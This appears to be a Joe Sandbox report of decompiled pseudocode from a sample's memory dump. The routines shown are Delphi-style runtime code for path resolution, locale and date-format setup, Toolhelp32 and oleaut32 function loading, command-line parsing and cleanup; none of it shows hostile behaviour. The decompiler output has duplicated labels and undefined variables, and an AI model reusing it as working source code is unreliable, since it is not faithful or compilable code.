    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAA _v334;
    				char _v595;
    				void* _t45;
    				char* _t54;
    				char* _t64;
    				void* _t83;
    				intOrPtr* _t84;
    				char* _t90;
    				struct HINSTANCE__* _t91;
    				char* _t93;
    				void* _t94;
    				char* _t95;
    				void* _t96;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t91 = GetModuleHandleA("kernel32.dll");
    				if(_t91 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t93 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_t95 = E00404DF4(_v8 + 2);
    							if( *_t95 != 0) {
    								_t14 = _t95 + 1; // 0x1
    								_t93 = E00404DF4(_t14);
    								if( *_t93 != 0) {
    									L10:
    									_t83 = _t93 - _v8;
    									_push(_t83 + 1);
    									_push(_v8);
    									_push( &_v595);
    									L00401248();
    									while( *_t93 != 0) {
    										_t90 = E00404DF4(_t93 + 1);
    										_t45 = _t90 - _t93;
    										if(_t45 + _t83 + 1 <= 0x105) {
    											_push(_t45 + 1);
    											_push(_t93);
    											_push( &(( &_v595)[_t83]));
    											L00401248();
    											_t94 = FindFirstFileA( &_v595,  &_v334);
    											if(_t94 != 0xffffffff) {
    												FindClose(_t94);
    												_t54 =  &(_v334.cFileName);
    												_push(_t54);
    												L00401250();
    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
    													_push(0x105 - _t83 - 1);
    													_push( &(_v334.cFileName));
    													_push( &(( &(( &_v595)[_t83]))[1]));
    													L00401248();
    													_t64 =  &(_v334.cFileName);
    													_push(_t64);
    													L00401250();
    													_t83 = _t83 + _t64 + 1;
    													_t93 = _t90;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v595);
    									_push(_v8);
    									L00401248();
    								}
    							}
    						}
    					}
    				} else {
    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
    					if(_t84 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v595);
    						_push(_v8);
    						if( *_t84() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v595);
    							_push(_v8);
    							L00401248();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40b318);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E004040F8( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00407174(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040B31F);
    				return E00403E88( &_v16);
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00403EDC(_t10, _t18);
    				}
    				return E00403F78(_t10, _t5 - 1,  &_v260);
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00417A70() {
    
    				if( *0x454a18 == 0) {
    					 *0x454a18 = GetModuleHandleA("kernel32.dll");
    					if( *0x454a18 != 0) {
    						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
    						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
    						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
    						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
    						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
    						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
    						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
    						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
    						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
    						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
    						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
    						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
    						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
    						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
    						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
    						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
    					}
    				}
    				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040CA40() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
    				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
    				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
    				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
    				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
    				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
    				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
    				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
    				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
    				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
    				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
    				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
    				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
    				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
    				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
    				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
    				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
    				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
    				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
    				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
    				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
    				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
    				 *0x4547f4 = _t46;
    				return _t46;
    			}







    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
    				char _t5;
    				char _t6;
    				CHAR* _t7;
    				char _t9;
    				CHAR* _t11;
    				char _t14;
    				CHAR* _t15;
    				char _t17;
    				CHAR* _t19;
    				CHAR* _t22;
    				CHAR* _t23;
    				CHAR* _t32;
    				intOrPtr _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = __edx;
    				_t22 = __eax;
    				while(1) {
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L4:
    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
    						_t36 = 0;
    						_t32 = _t22;
    						while(1) {
    							_t6 =  *_t22;
    							if(_t6 <= 0x20) {
    								break;
    							}
    							if(_t6 != 0x22) {
    								_t7 = CharNextA(_t22);
    								_t36 = _t36 + _t7 - _t22;
    								_t22 = _t7;
    								continue;
    							}
    							_t22 = CharNextA(_t22);
    							while(1) {
    								_t9 =  *_t22;
    								if(_t9 == 0 || _t9 == 0x22) {
    									break;
    								}
    								_t11 = CharNextA(_t22);
    								_t36 = _t36 + _t11 - _t22;
    								_t22 = _t11;
    							}
    							if( *_t22 != 0) {
    								_t22 = CharNextA(_t22);
    							}
    						}
    						E00404478(_t34, _t36);
    						_t23 = _t32;
    						_t33 =  *_t34;
    						_t35 = 0;
    						while(1) {
    							_t14 =  *_t23;
    							if(_t14 <= 0x20) {
    								break;
    							}
    							if(_t14 != 0x22) {
    								_t15 = CharNextA(_t23);
    								if(_t15 <= _t23) {
    									continue;
    								} else {
    									goto L27;
    								}
    								do {
    									L27:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t15 > _t23);
    								continue;
    							}
    							_t23 = CharNextA(_t23);
    							while(1) {
    								_t17 =  *_t23;
    								if(_t17 == 0 || _t17 == 0x22) {
    									break;
    								}
    								_t19 = CharNextA(_t23);
    								if(_t19 <= _t23) {
    									continue;
    								} else {
    									goto L21;
    								}
    								do {
    									L21:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t19 > _t23);
    							}
    							if( *_t23 != 0) {
    								_t23 = CharNextA(_t23);
    							}
    						}
    						return _t23;
    					} else {
    						_t22 =  &(_t22[2]);
    						continue;
    					}
    				}
    			}




















    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x45308c; // 0x454044
    				if( *_t14 == 0) {
    					_t16 =  *0x452f6c; // 0x405f30
    					_t9 = _t16 + 4; // 0xffe9
    					_t18 =  *0x454660; // 0x400000
    					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x452f90; // 0x454214
    				E00402784(E00402A8C(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00407764( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
    			}













    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00401A74() {
    				void* _t2;
    				void* _t3;
    				void* _t14;
    				intOrPtr* _t19;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				intOrPtr _t28;
    
    				_t26 = _t28;
    				if( *0x4545bc == 0) {
    					return _t2;
    				} else {
    					_push(_t26);
    					_push(E00401B4A);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t28;
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L0040130C();
    					}
    					 *0x4545bc = 0;
    					_t3 =  *0x45461c; // 0x0
    					LocalFree(_t3);
    					 *0x45461c = 0;
    					_t19 =  *0x4545e4; // 0x4545e4
    					while(_t19 != 0x4545e4) {
    						_t1 = _t19 + 8; // 0x0
    						VirtualFree( *_t1, 0, 0x8000);
    						_t19 =  *_t19;
    					}
    					E00401374(0x4545e4);
    					E00401374(0x4545f4);
    					E00401374(0x454620);
    					_t14 =  *0x4545dc; // 0x0
    					while(_t14 != 0) {
    						 *0x4545dc =  *_t14;
    						LocalFree(_t14);
    						_t14 =  *0x4545dc; // 0x0
    					}
    					_pop(_t23);
    					 *[fs:eax] = _t23;
    					_push(0x401b51);
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L00401314();
    					}
    					_push(0x4545c4);
    					L0040131C();
    					return 0;
    				}
    			}











    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40b7df);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040B3A0();
    				E00409E60(__ebx, __edi, __esi);
    				_t196 =  *0x454744;
    				if( *0x454744 != 0) {
    					E0040A038(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E00409DB0(_t43, 0, 0x14,  &_v20);
    				E00403EDC(0x454678, _v20);
    				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
    				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
    				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
    				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
    				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
    				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
    				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
    				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
    				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
    				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00403EDC(0x454684, _v36);
    				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00403EDC(0x454688, _v44);
    				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
    				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
    				E00403EDC(0x454690, _v52);
    				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
    				E00403EDC(0x454694, _v56);
    				E00403E88( &_v12);
    				E00403E88( &_v16);
    				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
    				_t104 = E00407174(0x40b7f4, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00403F20( &_v8, 0x40b84c);
    				} else {
    					E00403F20( &_v8, 0x40b840);
    				}
    				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
    				_t111 = E00407174(0x40b7f4, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
    					if(E00407174(0x40b7f4, 0, _t198) != 0) {
    						E00403F20( &_v12, 0x40b868);
    					} else {
    						E00403F20( &_v16, 0x40b858);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404208();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404208();
    				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040B7E6);
    				return E00403EAC( &_v68, 0x10);
    			}


























    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
